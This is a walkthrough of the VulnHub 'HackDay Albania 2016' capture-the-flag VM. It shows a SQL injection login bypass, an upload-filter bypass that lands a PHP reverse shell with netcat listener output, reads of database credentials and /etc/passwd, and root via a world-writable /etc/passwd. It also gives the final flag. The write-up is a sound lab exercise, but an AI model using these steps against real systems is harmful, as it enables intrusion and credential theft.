HackDay CTF 2016 (Albania)
Location
https://download.vulnhub.com/hackday/HackDay-Albania.ova
Introduction
Hack Day Albania is the event that brings together students passionate about cyber security. This activity is organized for the second consecutive year from ALCIRT with the support of MIAP.
Getting Started
Starting with a nmap scan.
┌─[n13mant@planetmars]─[~] └──╼ $sudo nmap -A -T4 -sSV -p- 192.168.171.3 Starting Nmap 7.31 ( https://nmap.org ) at 2016-11-28 09:46 CET Nmap scan report for 192.168.171.3 Host is up (0.00023s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 39:76:a2:f0:82:5f:1f:75:0d:e4:c4:c5:a7:48:b1:58 (RSA) |_ 256 21:fe:63:45:2c:cb:a1:f1:b6:ba:36:dd:ed:d3:d9:48 (ECDSA) 8008/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-robots.txt: 26 disallowed entries (15 shown) | /rkfpuzrahngvat/ /slgqvasbiohwbu/ /tmhrwbtcjpixcv/ | /vojtydvelrkzex/ /wpkuzewfmslafy/ /xqlvafxgntmbgz/ /yrmwbgyhouncha/ | /zsnxchzipvodib/ /atoydiajqwpejc/ /bupzejbkrxqfkd/ /cvqafkclsyrgle/ |_/unisxcudkqjydw/ /dwrbgldmtzshmf/ /exschmenuating/ /fytdinfovbujoh/ |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: HackDay Albania 2016 MAC Address: 08:00:27:98:0D:5F (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.4 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.23 ms 192.168.171.3 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 13.08 seconds
No usable banner information at port 22. Checking the website on port 8008.
The nmap scan showed the use of ‘robots.txt’. It has a long list of restricted pages.
Because I don’t speak Albanian, I need to let Google translate the found text: If I am, I know where to go;)
After removing the pop-up box Elliot from the show Mr. Robot is visible.
First checking the source code. There is a comment at the bottom: OK ok, but not here :)
The background picture didn’t had any information in it, so I start with the first page on the ‘robots.txt’ page.
Great…..Memes with Albanian text. I hope Google don’t mess up the translations and I get pointed into the wrong direction.
The translated text on the meme is: Is this the proper directory. Or is it jerk.
Right. After checking the second page it seems I’m being trolled. To automate my search a bit I create a small bash script to cURL the pages for me and give me back the html. If there is a different page, the outcome should tell me.
#!/bin/bash while read x do curl 192.168.171.3:8008/$x >> curl.txt done < list
When entering a single quote, I get the following error.
Looks like a SQLi vulnerability. At first I tried SQLMap, but it couldn’t retrieve the databases. After a while I searched the internet for some information about SQL authentication bypass and after a while I found a nice list which I could load up into Burpsuite. Unfortunately I couldn’t get this to work either. But the idea of the list sounded good. So i started to probe it manually and after some time (a lot), I got in using the string '%1#.
An uploading mechanism. First I tried to upload a php file containing phpinfo().
To bypass the security I change the filename and MIME type with burpsuite.
When I view the ticket I see that the command is being executed.
Time for a reverse shell. For the reverse shell I use the php script from pentestmonkey and upload it to the server. From the browser I view the ‘ticket’ and the script gets executed. I have my reverse shell.
┌─[n13mant@planetmars]─[~]
└──╼ $nc -lvnp 31337
listening on [any] 31337 ...
connect to [192.168.171.2] from (UNKNOWN) [192.168.171.3] 34432
Linux hackday 4.4.0-45-generic #66-Ubuntu SMP Wed Oct 19 14:12:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
18:22:55 up 8:45, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python -c 'import pty;pty.spawn("/bin/bash");'
/bin/sh: 2: python: not found
$ whereis python
python: /usr/bin/python3.5m /usr/bin/python3.5 /usr/lib/python3.5 /usr/lib/python2.7 /etc/python3.5 /usr/local/lib/python3.5 /usr/share/python
$ python3 -c 'import pty;pty.spawn("/bin/bash");'
www-data@hackday:/$
Now for some reconnaissance.
www-data@hackday:/$ cat /etc/*-release cat /etc/*-release DISTRIB_ID=Ubuntu DISTRIB_RELEASE=16.04 DISTRIB_CODENAME=xenial DISTRIB_DESCRIPTION="Ubuntu 16.04.1 LTS" NAME="Ubuntu" VERSION="16.04.1 LTS (Xenial Xerus)" ID=ubuntu ID_LIKE=debian PRETTY_NAME="Ubuntu 16.04.1 LTS" VERSION_ID="16.04" HOME_URL="http://www.ubuntu.com/" SUPPORT_URL="http://help.ubuntu.com/" BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/" UBUNTU_CODENAME=xenial www-data@hackday:/$ uname -a uname -a Linux hackday 4.4.0-45-generic #66-Ubuntu SMP Wed Oct 19 14:12:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
www-data@hackday:/var/www/html/unisxcudkqjydw/vulnbank/client$ cat config.php | more <tml/unisxcudkqjydw/vulnbank/client$ cat config.php | more <?php -----[SNIP]----- $db_host = "127.0.0.1"; $db_name = "bank_database"; $db_user = "root"; $db_password = "NuCiGoGo321"; -----[SNIP]-----
www-data@hackday:/$ netstat -l netstat -l Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 localhost:mysql *:* LISTEN tcp 0 0 *:ssh *:* LISTEN tcp6 0 0 [::]:8008 [::]:* LISTEN tcp6 0 0 [::]:ssh [::]:* LISTEN
www-data@hackday:/$ mysql --host=localhost --user=root --password=NuCiGoGo321 bank_database <-host=localhost --user=root --password=NuCiGoGo321 bank_database mysql: [Warning] Using a password on the command line interface can be insecure. Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 29 Server version: 5.7.12-0ubuntu1.1 (Ubuntu) Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved. Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. mysql> show databases; show databases; +--------------------+ | Database | +--------------------+ | information_schema | | bank_database | | mysql | | performance_schema | | sys | | vulnbank | +--------------------+ 6 rows in set (0.00 sec) mysql> use bank_database use bank_database Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed mysql> show tables; show tables; +-------------------------+ | Tables_in_bank_database | +-------------------------+ | klienti | | tickets | +-------------------------+ 2 rows in set (0.00 sec) mysql> select * from klienti; select * from klienti; +----+-------------+---------+---------+----------+------------+ | ID | emer | mbiemer | bilanci | username | password | +----+-------------+---------+---------+----------+------------+ | 1 | Charles D. | Hobson | 25000 | hobson | Charles123 | | 2 | Jeffery | Fischer | 120000 | jeff | jeff321 | +----+-------------+---------+---------+----------+------------+ 2 rows in set (0.00 sec)
www-data@hackday:/$ cat /etc/passwd cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false lxd:x:106:65534::/var/lib/lxd/:/bin/false mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false messagebus:x:108:112::/var/run/dbus:/bin/false uuidd:x:109:113::/run/uuidd:/bin/false dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin taviso:x:1000:1000:Taviso,,,:/home/taviso:/bin/bash
www-data@hackday:/$ ls -lah /etc | grep passwd ls -lah /etc | grep passwd -rw-r--rw- 1 root root 1.6K Oct 22 17:21 passwd
www-data@hackday:/etc$ ls -lah /home/taviso ls -lah /home/taviso total 32K drwxr-xr-x 4 taviso taviso 4.0K Oct 29 23:07 . drwxr-xr-x 3 root root 4.0K Oct 9 13:13 .. -rw------- 1 root root 17 Oct 29 23:07 .bash_history -rw-r--r-- 1 taviso taviso 220 Oct 9 13:13 .bash_logout -rw-r--r-- 1 taviso taviso 3.7K Oct 9 13:13 .bashrc drwx------ 2 taviso taviso 4.0K Oct 9 13:16 .cache drwxrwxr-x 2 taviso taviso 4.0K Oct 29 23:07 .nano -rw-r--r-- 1 taviso taviso 655 Oct 9 13:13 .profile -rw-r--r-- 1 taviso taviso 0 Oct 29 23:07 .sudo_as_admin_successful
www-data@hackday:/$ cat /etc/group | grep taviso cat /etc/group | grep taviso adm:x:4:syslog,taviso cdrom:x:24:taviso sudo:x:27:taviso dip:x:30:taviso plugdev:x:46:taviso lxd:x:110:taviso taviso:x:1000: lpadmin:x:117:taviso sambashare:x:118:taviso
So ‘taviso’ is in the sudo group and the /etc/passwd is writable.
┌─[n13mant@planetmars]─[~/Desktop] └──╼ $mkpasswd --method=sha-512 password $6$g9iswtWV1RYT$mfBdmezBzIz7v5pclDon55UwVuxqTBYDaeXqBdYP15xnu8zDZQ9rK5iput6mJSMut44E3hydQeYsLFfp8LUzz1
www-data@hackday:/$ sed -e 's/taviso:x/taviso:$6$g9iswtWV1RYT$mfBdmezBzIz7v5pclDon55UwVuxqTBYDaeXqBdYP15xnu8zDZQ9rK5iput6mJSMut44E3hydQeYsLFfp8LUzz1/g' /etc/passwd > /tmp/passwd <nu8zDZQ9rK5iput6mJSMut44E3hydQeYsLFfp8LUzz1/g' /etc/passwd > /tmp/passwd www-data@hackday:/$ cp /tmp/passwd /etc/passwd cp /tmp/passwd /etc/passwd www-data@hackday:/$ cat /etc/passwd | grep taviso cat /etc/passwd | grep taviso taviso:$6$g9iswtWV1RYT$mfBdmezBzIz7v5pclDon55UwVuxqTBYDaeXqBdYP15xnu8zDZQ9rK5iput6mJSMut44E3hydQeYsLFfp8LUzz1:1000:1000:Taviso,,,:/home/taviso:/bin/bash
www-data@hackday:/$ su taviso su taviso Password: password taviso@hackday:/$ sudo -l sudo -l Matching Defaults entries for taviso on hackday: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User taviso may run the following commands on hackday: (ALL : ALL) ALL taviso@hackday:/$ sudo su sudo su root@hackday:/# cd /root cd /root root@hackday:~# ls -lah ls -lah total 28K drwx------ 3 root root 4.0K Oct 22 17:21 . drwxr-xr-x 23 root root 4.0K Oct 26 21:48 .. -rw------- 1 root root 58 Oct 22 17:21 .bash_history -rw-r--r-- 1 root root 3.1K Oct 22 2015 .bashrc -rw-r--r-- 1 root root 61 Oct 9 13:36 flag.txt drwxr-xr-x 2 root root 4.0K Oct 9 13:18 .nano -rw-r--r-- 1 root root 148 Aug 17 2015 .profile root@hackday:~# cat flag.txt cat flag.txt Urime, Tani nis raportin! d5ed38fdbf28bc4e58be142cf5a17cf5
And that’s it. The last part said: Congratulations, Now begins the report! (or at least that’s what Google makes of it).
The flag is a md5 hash > plaintext = rio
THE END